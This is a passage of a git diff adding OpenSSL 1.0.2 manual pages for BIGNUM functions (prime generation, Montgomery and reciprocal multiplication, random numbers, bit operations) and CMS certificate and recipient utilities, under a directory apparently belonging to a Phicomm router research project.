+ int BN_GENCB_call(BN_GENCB *cb, int a, int b);
+
+ #define BN_GENCB_set_old(gencb, callback, cb_arg) ...
+
+ #define BN_GENCB_set(gencb, callback, cb_arg) ...
+
+
+Deprecated:
+
+ BIGNUM *BN_generate_prime(BIGNUM *ret, int num, int safe, BIGNUM *add,
+     BIGNUM *rem, void (*callback)(int, int, void *), void *cb_arg);
+
+ int BN_is_prime(const BIGNUM *a, int checks, void (*callback)(int, int, 
+     void *), BN_CTX *ctx, void *cb_arg);
+
+ int BN_is_prime_fasttest(const BIGNUM *a, int checks,
+     void (*callback)(int, int, void *), BN_CTX *ctx, void *cb_arg,
+     int do_trial_division);
+
+=head1 DESCRIPTION
+
+BN_generate_prime_ex() generates a pseudo-random prime number of
+bit length B<bits>.
+If B<ret> is not B<NULL>, it will be used to store the number.
+
+If B<cb> is not B<NULL>, it is used as follows:
+
+=over 4
+
+=item *
+
+B<BN_GENCB_call(cb, 0, i)> is called after generating the i-th
+potential prime number.
+
+=item *
+
+While the number is being tested for primality,
+B<BN_GENCB_call(cb, 1, j)> is called as described below.
+
+=item *
+
+When a prime has been found, B<BN_GENCB_call(cb, 2, i)> is called.
+
+=back
+
+The prime may have to fulfill additional requirements for use in
+Diffie-Hellman key exchange:
+
+If B<add> is not B<NULL>, the prime will fulfill the condition p % B<add>
+== B<rem> (p % B<add> == 1 if B<rem> == B<NULL>) in order to suit a given
+generator.
+
+If B<safe> is true, it will be a safe prime (i.e. a prime p so
+that (p-1)/2 is also prime).
+
+The PRNG must be seeded prior to calling BN_generate_prime_ex().
+The prime number generation has a negligible error probability.
+
+BN_is_prime_ex() and BN_is_prime_fasttest_ex() test if the number B<p> is
+prime.  The following tests are performed until one of them shows that
+B<p> is composite; if B<p> passes all these tests, it is considered
+prime.
+
+BN_is_prime_fasttest_ex(), when called with B<do_trial_division == 1>,
+first attempts trial division by a number of small primes;
+if no divisors are found by this test and B<cb> is not B<NULL>,
+B<BN_GENCB_call(cb, 1, -1)> is called.
+If B<do_trial_division == 0>, this test is skipped.
+
+Both BN_is_prime_ex() and BN_is_prime_fasttest_ex() perform a Miller-Rabin
+probabilistic primality test with B<nchecks> iterations. If
+B<nchecks == BN_prime_checks>, a number of iterations is used that
+yields a false positive rate of at most 2^-80 for random input.
+
+If B<cb> is not B<NULL>, B<BN_GENCB_call(cb, 1, j)> is called
+after the j-th iteration (j = 0, 1, ...). B<ctx> is a
+pre-allocated B<BN_CTX> (to save the overhead of allocating and
+freeing the structure in a loop), or B<NULL>.
+
+BN_GENCB_call calls the callback function held in the B<BN_GENCB> structure
+and passes the ints B<a> and B<b> as arguments. There are two types of
+B<BN_GENCB> structure that are supported: "new" style and "old" style. New
+programs should prefer the "new" style, whilst the "old" style is provided
+for backwards compatibility purposes.
+
+For "new" style callbacks a BN_GENCB structure should be initialised with a
+call to BN_GENCB_set, where B<gencb> is a B<BN_GENCB *>, B<callback> is of
+type B<int (*callback)(int, int, BN_GENCB *)> and B<cb_arg> is a B<void *>.
+"Old" style callbacks are the same except they are initialised with a call
+to BN_GENCB_set_old and B<callback> is of type
+B<void (*callback)(int, int, void *)>.
+
+A callback is invoked through a call to B<BN_GENCB_call>. This will check
+the type of the callback and will invoke B<callback(a, b, gencb)> for new
+style callbacks or B<callback(a, b, cb_arg)> for old style.
+
+BN_generate_prime (deprecated) works in the same way as
+BN_generate_prime_ex but expects an old style callback function
+directly in the B<callback> parameter, and an argument to pass to it in
+the B<cb_arg>. Similarly BN_is_prime and BN_is_prime_fasttest are
+deprecated and can be compared to BN_is_prime_ex and
+BN_is_prime_fasttest_ex respectively.
+
+=head1 RETURN VALUES
+
+BN_generate_prime_ex() return 1 on success or 0 on error.
+
+BN_is_prime_ex(), BN_is_prime_fasttest_ex(), BN_is_prime() and
+BN_is_prime_fasttest() return 0 if the number is composite, 1 if it is
+prime with an error probability of less than 0.25^B<nchecks>, and
+-1 on error.
+
+BN_generate_prime() returns the prime number on success, B<NULL> otherwise.
+
+Callback functions should return 1 on success or 0 on error.
+
+The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>, L<ERR_get_error(3)|ERR_get_error(3)>, L<rand(3)|rand(3)>
+
+=head1 HISTORY
+
+The B<cb_arg> arguments to BN_generate_prime() and to BN_is_prime()
+were added in SSLeay 0.9.0. The B<ret> argument to BN_generate_prime()
+was added in SSLeay 0.9.1.
+BN_is_prime_fasttest() was added in OpenSSL 0.9.5.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_mod_inverse.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_mod_inverse.pod
new file mode 100644
index 0000000..3ea3975
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_mod_inverse.pod
@@ -0,0 +1,36 @@
+=pod
+
+=head1 NAME
+
+BN_mod_inverse - compute inverse modulo n
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ BIGNUM *BN_mod_inverse(BIGNUM *r, BIGNUM *a, const BIGNUM *n,
+           BN_CTX *ctx);
+
+=head1 DESCRIPTION
+
+BN_mod_inverse() computes the inverse of B<a> modulo B<n>
+places the result in B<r> (C<(a*r)%n==1>). If B<r> is NULL,
+a new B<BIGNUM> is created.
+
+B<ctx> is a previously allocated B<BN_CTX> used for temporary
+variables. B<r> may be the same B<BIGNUM> as B<a> or B<n>.
+
+=head1 RETURN VALUES
+
+BN_mod_inverse() returns the B<BIGNUM> containing the inverse, and
+NULL on error. The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>, L<ERR_get_error(3)|ERR_get_error(3)>, L<BN_add(3)|BN_add(3)>
+
+=head1 HISTORY
+
+BN_mod_inverse() is available in all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_mod_mul_montgomery.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_mod_mul_montgomery.pod
new file mode 100644
index 0000000..6b16351
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_mod_mul_montgomery.pod
@@ -0,0 +1,101 @@
+=pod
+
+=head1 NAME
+
+BN_mod_mul_montgomery, BN_MONT_CTX_new, BN_MONT_CTX_init,
+BN_MONT_CTX_free, BN_MONT_CTX_set, BN_MONT_CTX_copy,
+BN_from_montgomery, BN_to_montgomery - Montgomery multiplication
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ BN_MONT_CTX *BN_MONT_CTX_new(void);
+ void BN_MONT_CTX_init(BN_MONT_CTX *ctx);
+ void BN_MONT_CTX_free(BN_MONT_CTX *mont);
+
+ int BN_MONT_CTX_set(BN_MONT_CTX *mont, const BIGNUM *m, BN_CTX *ctx);
+ BN_MONT_CTX *BN_MONT_CTX_copy(BN_MONT_CTX *to, BN_MONT_CTX *from);
+
+ int BN_mod_mul_montgomery(BIGNUM *r, BIGNUM *a, BIGNUM *b,
+         BN_MONT_CTX *mont, BN_CTX *ctx);
+
+ int BN_from_montgomery(BIGNUM *r, BIGNUM *a, BN_MONT_CTX *mont,
+         BN_CTX *ctx);
+
+ int BN_to_montgomery(BIGNUM *r, BIGNUM *a, BN_MONT_CTX *mont,
+         BN_CTX *ctx);
+
+=head1 DESCRIPTION
+
+These functions implement Montgomery multiplication. They are used
+automatically when L<BN_mod_exp(3)|BN_mod_exp(3)> is called with suitable input,
+but they may be useful when several operations are to be performed
+using the same modulus.
+
+BN_MONT_CTX_new() allocates and initializes a B<BN_MONT_CTX> structure.
+BN_MONT_CTX_init() initializes an existing uninitialized B<BN_MONT_CTX>.
+
+BN_MONT_CTX_set() sets up the I<mont> structure from the modulus I<m>
+by precomputing its inverse and a value R.
+
+BN_MONT_CTX_copy() copies the B<BN_MONT_CTX> I<from> to I<to>.
+
+BN_MONT_CTX_free() frees the components of the B<BN_MONT_CTX>, and, if
+it was created by BN_MONT_CTX_new(), also the structure itself.
+
+BN_mod_mul_montgomery() computes Mont(I<a>,I<b>):=I<a>*I<b>*R^-1 and places
+the result in I<r>.
+
+BN_from_montgomery() performs the Montgomery reduction I<r> = I<a>*R^-1.
+
+BN_to_montgomery() computes Mont(I<a>,R^2), i.e. I<a>*R.
+Note that I<a> must be non-negative and smaller than the modulus.
+
+For all functions, I<ctx> is a previously allocated B<BN_CTX> used for
+temporary variables.
+
+The B<BN_MONT_CTX> structure is defined as follows:
+
+ typedef struct bn_mont_ctx_st
+        {
+        int ri;         /* number of bits in R */
+        BIGNUM RR;      /* R^2 (used to convert to Montgomery form) */
+        BIGNUM N;       /* The modulus */
+        BIGNUM Ni;      /* R*(1/R mod N) - N*Ni = 1
+                         * (Ni is only stored for bignum algorithm) */
+        BN_ULONG n0;    /* least significant word of Ni */
+        int flags;
+        } BN_MONT_CTX;
+
+BN_to_montgomery() is a macro.
+
+=head1 RETURN VALUES
+
+BN_MONT_CTX_new() returns the newly allocated B<BN_MONT_CTX>, and NULL
+on error.
+
+BN_MONT_CTX_init() and BN_MONT_CTX_free() have no return values.
+
+For the other functions, 1 is returned for success, 0 on error.
+The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 WARNING
+
+The inputs must be reduced modulo B<m>, otherwise the result will be
+outside the expected range.
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>, L<ERR_get_error(3)|ERR_get_error(3)>, L<BN_add(3)|BN_add(3)>,
+L<BN_CTX_new(3)|BN_CTX_new(3)>
+
+=head1 HISTORY
+
+BN_MONT_CTX_new(), BN_MONT_CTX_free(), BN_MONT_CTX_set(),
+BN_mod_mul_montgomery(), BN_from_montgomery() and BN_to_montgomery()
+are available in all versions of SSLeay and OpenSSL.
+
+BN_MONT_CTX_init() and BN_MONT_CTX_copy() were added in SSLeay 0.9.1b.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_mod_mul_reciprocal.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_mod_mul_reciprocal.pod
new file mode 100644
index 0000000..74a216d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_mod_mul_reciprocal.pod
@@ -0,0 +1,81 @@
+=pod
+
+=head1 NAME
+
+BN_mod_mul_reciprocal,  BN_div_recp, BN_RECP_CTX_new, BN_RECP_CTX_init,
+BN_RECP_CTX_free, BN_RECP_CTX_set - modular multiplication using
+reciprocal
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ BN_RECP_CTX *BN_RECP_CTX_new(void);
+ void BN_RECP_CTX_init(BN_RECP_CTX *recp);
+ void BN_RECP_CTX_free(BN_RECP_CTX *recp);
+
+ int BN_RECP_CTX_set(BN_RECP_CTX *recp, const BIGNUM *m, BN_CTX *ctx);
+
+ int BN_div_recp(BIGNUM *dv, BIGNUM *rem, BIGNUM *a, BN_RECP_CTX *recp,
+        BN_CTX *ctx);
+
+ int BN_mod_mul_reciprocal(BIGNUM *r, BIGNUM *a, BIGNUM *b,
+        BN_RECP_CTX *recp, BN_CTX *ctx);
+
+=head1 DESCRIPTION
+
+BN_mod_mul_reciprocal() can be used to perform an efficient
+L<BN_mod_mul(3)|BN_mod_mul(3)> operation when the operation will be performed
+repeatedly with the same modulus. It computes B<r>=(B<a>*B<b>)%B<m>
+using B<recp>=1/B<m>, which is set as described below.  B<ctx> is a
+previously allocated B<BN_CTX> used for temporary variables.
+
+BN_RECP_CTX_new() allocates and initializes a B<BN_RECP> structure.
+BN_RECP_CTX_init() initializes an existing uninitialized B<BN_RECP>.
+
+BN_RECP_CTX_free() frees the components of the B<BN_RECP>, and, if it
+was created by BN_RECP_CTX_new(), also the structure itself.
+
+BN_RECP_CTX_set() stores B<m> in B<recp> and sets it up for computing
+1/B<m> and shifting it left by BN_num_bits(B<m>)+1 to make it an
+integer. The result and the number of bits it was shifted left will
+later be stored in B<recp>.
+
+BN_div_recp() divides B<a> by B<m> using B<recp>. It places the quotient
+in B<dv> and the remainder in B<rem>.
+
+The B<BN_RECP_CTX> structure is defined as follows:
+
+ typedef struct bn_recp_ctx_st
+	{
+	BIGNUM N;	/* the divisor */
+	BIGNUM Nr;	/* the reciprocal */
+	int num_bits;
+	int shift;
+	int flags;
+	} BN_RECP_CTX;
+
+It cannot be shared between threads.
+
+=head1 RETURN VALUES
+
+BN_RECP_CTX_new() returns the newly allocated B<BN_RECP_CTX>, and NULL
+on error.
+
+BN_RECP_CTX_init() and BN_RECP_CTX_free() have no return values.
+
+For the other functions, 1 is returned for success, 0 on error.
+The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>, L<ERR_get_error(3)|ERR_get_error(3)>, L<BN_add(3)|BN_add(3)>,
+L<BN_CTX_new(3)|BN_CTX_new(3)>
+
+=head1 HISTORY
+
+B<BN_RECP_CTX> was added in SSLeay 0.9.0. Before that, the function
+BN_reciprocal() was used instead, and the BN_mod_mul_reciprocal()
+arguments were different.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_new.pod
new file mode 100644
index 0000000..ab7a105
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_new.pod
@@ -0,0 +1,53 @@
+=pod
+
+=head1 NAME
+
+BN_new, BN_init, BN_clear, BN_free, BN_clear_free - allocate and free BIGNUMs
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ BIGNUM *BN_new(void);
+
+ void BN_init(BIGNUM *);
+
+ void BN_clear(BIGNUM *a);
+
+ void BN_free(BIGNUM *a);
+
+ void BN_clear_free(BIGNUM *a);
+
+=head1 DESCRIPTION
+
+BN_new() allocates and initializes a B<BIGNUM> structure. BN_init()
+initializes an existing uninitialized B<BIGNUM>.
+
+BN_clear() is used to destroy sensitive data such as keys when they
+are no longer needed. It erases the memory used by B<a> and sets it
+to the value 0.
+
+BN_free() frees the components of the B<BIGNUM>, and if it was created
+by BN_new(), also the structure itself. BN_clear_free() additionally
+overwrites the data before the memory is returned to the system.
+
+=head1 RETURN VALUES
+
+BN_new() returns a pointer to the B<BIGNUM>. If the allocation fails,
+it returns B<NULL> and sets an error code that can be obtained
+by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+BN_init(), BN_clear(), BN_free() and BN_clear_free() have no return
+values.
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>, L<ERR_get_error(3)|ERR_get_error(3)>
+
+=head1 HISTORY
+
+BN_new(), BN_clear(), BN_free() and BN_clear_free() are available in
+all versions on SSLeay and OpenSSL.  BN_init() was added in SSLeay
+0.9.1b.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_num_bytes.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_num_bytes.pod
new file mode 100644
index 0000000..a6a2e3f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_num_bytes.pod
@@ -0,0 +1,57 @@
+=pod
+
+=head1 NAME
+
+BN_num_bits, BN_num_bytes, BN_num_bits_word - get BIGNUM size
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ int BN_num_bytes(const BIGNUM *a);
+
+ int BN_num_bits(const BIGNUM *a);
+
+ int BN_num_bits_word(BN_ULONG w);
+
+=head1 DESCRIPTION
+
+BN_num_bytes() returns the size of a B<BIGNUM> in bytes.
+
+BN_num_bits_word() returns the number of significant bits in a word.
+If we take 0x00000432 as an example, it returns 11, not 16, not 32.
+Basically, except for a zero, it returns I<floor(log2(w))+1>.
+
+BN_num_bits() returns the number of significant bits in a B<BIGNUM>,
+following the same principle as BN_num_bits_word().
+
+BN_num_bytes() is a macro.
+
+=head1 RETURN VALUES
+
+The size.
+
+=head1 NOTES
+
+Some have tried using BN_num_bits() on individual numbers in RSA keys,
+DH keys and DSA keys, and found that they don't always come up with
+the number of bits they expected (something like 512, 1024, 2048,
+...).  This is because generating a number with some specific number
+of bits doesn't always set the highest bits, thereby making the number
+of I<significant> bits a little lower.  If you want to know the "key
+size" of such a key, either use functions like RSA_size(), DH_size()
+and DSA_size(), or use BN_num_bytes() and multiply with 8 (although
+there's no real guarantee that will match the "key size", just a lot
+more probability).
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>, L<DH_size(3)|DH_size(3)>, L<DSA_size(3)|DSA_size(3)>,
+L<RSA_size(3)|RSA_size(3)>
+
+=head1 HISTORY
+
+BN_num_bytes(), BN_num_bits() and BN_num_bits_word() are available in
+all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_rand.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_rand.pod
new file mode 100644
index 0000000..d6b975c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_rand.pod
@@ -0,0 +1,58 @@
+=pod
+
+=head1 NAME
+
+BN_rand, BN_pseudo_rand, BN_rand_range, BN_pseudo_rand_range - generate pseudo-random number
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ int BN_rand(BIGNUM *rnd, int bits, int top, int bottom);
+
+ int BN_pseudo_rand(BIGNUM *rnd, int bits, int top, int bottom);
+
+ int BN_rand_range(BIGNUM *rnd, BIGNUM *range);
+
+ int BN_pseudo_rand_range(BIGNUM *rnd, BIGNUM *range);
+
+=head1 DESCRIPTION
+
+BN_rand() generates a cryptographically strong pseudo-random number of
+B<bits> bits in length and stores it in B<rnd>. If B<top> is -1, the
+most significant bit of the random number can be zero. If B<top> is 0,
+it is set to 1, and if B<top> is 1, the two most significant bits of
+the number will be set to 1, so that the product of two such random
+numbers will always have 2*B<bits> length.  If B<bottom> is true, the
+number will be odd.
+
+BN_pseudo_rand() does the same, but pseudo-random numbers generated by
+this function are not necessarily unpredictable. They can be used for
+non-cryptographic purposes and for certain purposes in cryptographic
+protocols, but usually not for key generation etc.
+
+BN_rand_range() generates a cryptographically strong pseudo-random
+number B<rnd> in the range 0 <lt>= B<rnd> E<lt> B<range>.
+BN_pseudo_rand_range() does the same, but is based on BN_pseudo_rand(),
+and hence numbers generated by it are not necessarily unpredictable.
+
+The PRNG must be seeded prior to calling BN_rand() or BN_rand_range().
+
+=head1 RETURN VALUES
+
+The functions return 1 on success, 0 on error.
+The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>, L<ERR_get_error(3)|ERR_get_error(3)>, L<rand(3)|rand(3)>,
+L<RAND_add(3)|RAND_add(3)>, L<RAND_bytes(3)|RAND_bytes(3)>
+
+=head1 HISTORY
+
+BN_rand() is available in all versions of SSLeay and OpenSSL.
+BN_pseudo_rand() was added in OpenSSL 0.9.5. The B<top> == -1 case
+and the function BN_rand_range() were added in OpenSSL 0.9.6a.
+BN_pseudo_rand_range() was added in OpenSSL 0.9.6c.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_set_bit.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_set_bit.pod
new file mode 100644
index 0000000..b7c47b9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_set_bit.pod
@@ -0,0 +1,66 @@
+=pod
+
+=head1 NAME
+
+BN_set_bit, BN_clear_bit, BN_is_bit_set, BN_mask_bits, BN_lshift,
+BN_lshift1, BN_rshift, BN_rshift1 - bit operations on BIGNUMs
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ int BN_set_bit(BIGNUM *a, int n);
+ int BN_clear_bit(BIGNUM *a, int n);
+
+ int BN_is_bit_set(const BIGNUM *a, int n);
+
+ int BN_mask_bits(BIGNUM *a, int n);
+
+ int BN_lshift(BIGNUM *r, const BIGNUM *a, int n);
+ int BN_lshift1(BIGNUM *r, BIGNUM *a);
+
+ int BN_rshift(BIGNUM *r, BIGNUM *a, int n);
+ int BN_rshift1(BIGNUM *r, BIGNUM *a);
+
+=head1 DESCRIPTION
+
+BN_set_bit() sets bit B<n> in B<a> to 1 (C<a|=(1E<lt>E<lt>n)>). The
+number is expanded if necessary.
+
+BN_clear_bit() sets bit B<n> in B<a> to 0 (C<a&=~(1E<lt>E<lt>n)>). An
+error occurs if B<a> is shorter than B<n> bits.
+
+BN_is_bit_set() tests if bit B<n> in B<a> is set.
+
+BN_mask_bits() truncates B<a> to an B<n> bit number
+(C<a&=~((~0)E<gt>E<gt>n)>).  An error occurs if B<a> already is
+shorter than B<n> bits.
+
+BN_lshift() shifts B<a> left by B<n> bits and places the result in
+B<r> (C<r=a*2^n>). BN_lshift1() shifts B<a> left by one and places
+the result in B<r> (C<r=2*a>).
+
+BN_rshift() shifts B<a> right by B<n> bits and places the result in
+B<r> (C<r=a/2^n>). BN_rshift1() shifts B<a> right by one and places
+the result in B<r> (C<r=a/2>).
+
+For the shift functions, B<r> and B<a> may be the same variable.
+
+=head1 RETURN VALUES
+
+BN_is_bit_set() returns 1 if the bit is set, 0 otherwise.
+
+All other functions return 1 for success, 0 on error. The error codes
+can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>, L<BN_num_bytes(3)|BN_num_bytes(3)>, L<BN_add(3)|BN_add(3)>
+
+=head1 HISTORY
+
+BN_set_bit(), BN_clear_bit(), BN_is_bit_set(), BN_mask_bits(),
+BN_lshift(), BN_lshift1(), BN_rshift(), and BN_rshift1() are available
+in all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_swap.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_swap.pod
new file mode 100644
index 0000000..79efaa1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_swap.pod
@@ -0,0 +1,23 @@
+=pod
+
+=head1 NAME
+
+BN_swap - exchange BIGNUMs
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ void BN_swap(BIGNUM *a, BIGNUM *b);
+
+=head1 DESCRIPTION
+
+BN_swap() exchanges the values of I<a> and I<b>.
+
+L<bn(3)|bn(3)>
+
+=head1 HISTORY
+
+BN_swap was added in OpenSSL 0.9.7.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_zero.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_zero.pod
new file mode 100644
index 0000000..b555ec3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BN_zero.pod
@@ -0,0 +1,59 @@
+=pod
+
+=head1 NAME
+
+BN_zero, BN_one, BN_value_one, BN_set_word, BN_get_word - BIGNUM assignment
+operations
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ int BN_zero(BIGNUM *a);
+ int BN_one(BIGNUM *a);
+
+ const BIGNUM *BN_value_one(void);
+
+ int BN_set_word(BIGNUM *a, unsigned long w);
+ unsigned long BN_get_word(BIGNUM *a);
+
+=head1 DESCRIPTION
+
+BN_zero(), BN_one() and BN_set_word() set B<a> to the values 0, 1 and
+B<w> respectively.  BN_zero() and BN_one() are macros.
+
+BN_value_one() returns a B<BIGNUM> constant of value 1. This constant
+is useful for use in comparisons and assignment.
+
+BN_get_word() returns B<a>, if it can be represented as an unsigned
+long.
+
+=head1 RETURN VALUES
+
+BN_get_word() returns the value B<a>, and 0xffffffffL if B<a> cannot
+be represented as an unsigned long.
+
+BN_zero(), BN_one() and BN_set_word() return 1 on success, 0 otherwise.
+BN_value_one() returns the constant.
+
+=head1 BUGS
+
+Someone might change the constant.
+
+If a B<BIGNUM> is equal to 0xffffffffL it can be represented as an
+unsigned long but this value is also returned on error.
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>, L<BN_bn2bin(3)|BN_bn2bin(3)>
+
+=head1 HISTORY
+
+BN_zero(), BN_one() and BN_set_word() are available in all versions of
+SSLeay and OpenSSL. BN_value_one() and BN_get_word() were added in
+SSLeay 0.8.
+
+BN_value_one() was changed to return a true const BIGNUM * in OpenSSL
+0.9.7.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_add0_cert.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_add0_cert.pod
new file mode 100644
index 0000000..8678ca1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_add0_cert.pod
@@ -0,0 +1,66 @@
+=pod
+
+=head1 NAME
+
+CMS_add0_cert, CMS_add1_cert, CMS_get1_certs, CMS_add0_crl, CMS_add1_crl, CMS_get1_crls, - CMS certificate and CRL utility functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ int CMS_add0_cert(CMS_ContentInfo *cms, X509 *cert);
+ int CMS_add1_cert(CMS_ContentInfo *cms, X509 *cert);
+ STACK_OF(X509) *CMS_get1_certs(CMS_ContentInfo *cms);
+
+ int CMS_add0_crl(CMS_ContentInfo *cms, X509_CRL *crl);
+ int CMS_add1_crl(CMS_ContentInfo *cms, X509_CRL *crl);
+ STACK_OF(X509_CRL) *CMS_get1_crls(CMS_ContentInfo *cms);
+
+
+=head1 DESCRIPTION
+
+CMS_add0_cert() and CMS_add1_cert() add certificate B<cert> to B<cms>.
+must be of type signed data or enveloped data. 
+
+CMS_get1_certs() returns all certificates in B<cms>.
+
+CMS_add0_crl() and CMS_add1_crl() add CRL B<crl> to B<cms>. CMS_get1_crls()
+returns any CRLs in B<cms>.
+
+=head1 NOTES
+
+The CMS_ContentInfo structure B<cms> must be of type signed data or enveloped
+data or an error will be returned.
+
+For signed data certificates and CRLs are added to the B<certificates> and
+B<crls> fields of SignedData structure. For enveloped data they are added to
+B<OriginatorInfo>.
+
+As the B<0> implies CMS_add0_cert() adds B<cert> internally to B<cms> and it
+must not be freed up after the call as opposed to CMS_add1_cert() where B<cert>
+must be freed up.
+
+The same certificate or CRL must not be added to the same cms structure more
+than once.
+
+=head1 RETURN VALUES
+
+CMS_add0_cert(), CMS_add1_cert() and CMS_add0_crl() and CMS_add1_crl() return
+1 for success and 0 for failure. 
+
+CMS_get1_certs() and CMS_get1_crls() return the STACK of certificates or CRLs
+or NULL if there are none or an error occurs. The only error which will occur
+in practice is if the B<cms> type is invalid.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>,
+L<CMS_sign(3)|CMS_sign(3)>,
+L<CMS_encrypt(3)|CMS_encrypt(3)>
+
+=head1 HISTORY
+
+CMS_add0_cert(), CMS_add1_cert(), CMS_get1_certs(), CMS_add0_crl()
+and CMS_get1_crls() were all first added to OpenSSL 0.9.8
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_add1_recipient_cert.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_add1_recipient_cert.pod
new file mode 100644
index 0000000..d7d8e25
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_add1_recipient_cert.pod
@@ -0,0 +1,62 @@
+=pod
+
+=head1 NAME
+
+ CMS_add1_recipient_cert, CMS_add0_recipient_key - add recipients to a CMS enveloped data structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ CMS_RecipientInfo *CMS_add1_recipient_cert(CMS_ContentInfo *cms, X509 *recip, unsigned int flags);
+
+ CMS_RecipientInfo *CMS_add0_recipient_key(CMS_ContentInfo *cms, int nid, unsigned char *key, size_t keylen, unsigned char *id, size_t idlen, ASN1_GENERALIZEDTIME *date, ASN1_OBJECT *otherTypeId, ASN1_TYPE *otherType);
+
+=head1 DESCRIPTION
+
+CMS_add1_recipient_cert() adds recipient B<recip> to CMS_ContentInfo enveloped
+data structure B<cms> as a KeyTransRecipientInfo structure.
+
+CMS_add0_recipient_key() adds symmetric key B<key> of length B<keylen> using
+wrapping algorithm B<nid>, identifier B<id> of length B<idlen> and optional
+values B<date>, B<otherTypeId> and B<otherType> to CMS_ContentInfo enveloped
+data structure B<cms> as a KEKRecipientInfo structure.
+
+The CMS_ContentInfo structure should be obtained from an initial call to
+CMS_encrypt() with the flag B<CMS_PARTIAL> set.
+
+=head1 NOTES
+
+The main purpose of this function is to provide finer control over a CMS
+enveloped data structure where the simpler CMS_encrypt() function defaults are
+not appropriate. For example if one or more KEKRecipientInfo structures
+need to be added. New attributes can also be added using the returned
+CMS_RecipientInfo structure and the CMS attribute utility functions.
+
+OpenSSL will by default identify recipient certificates using issuer name
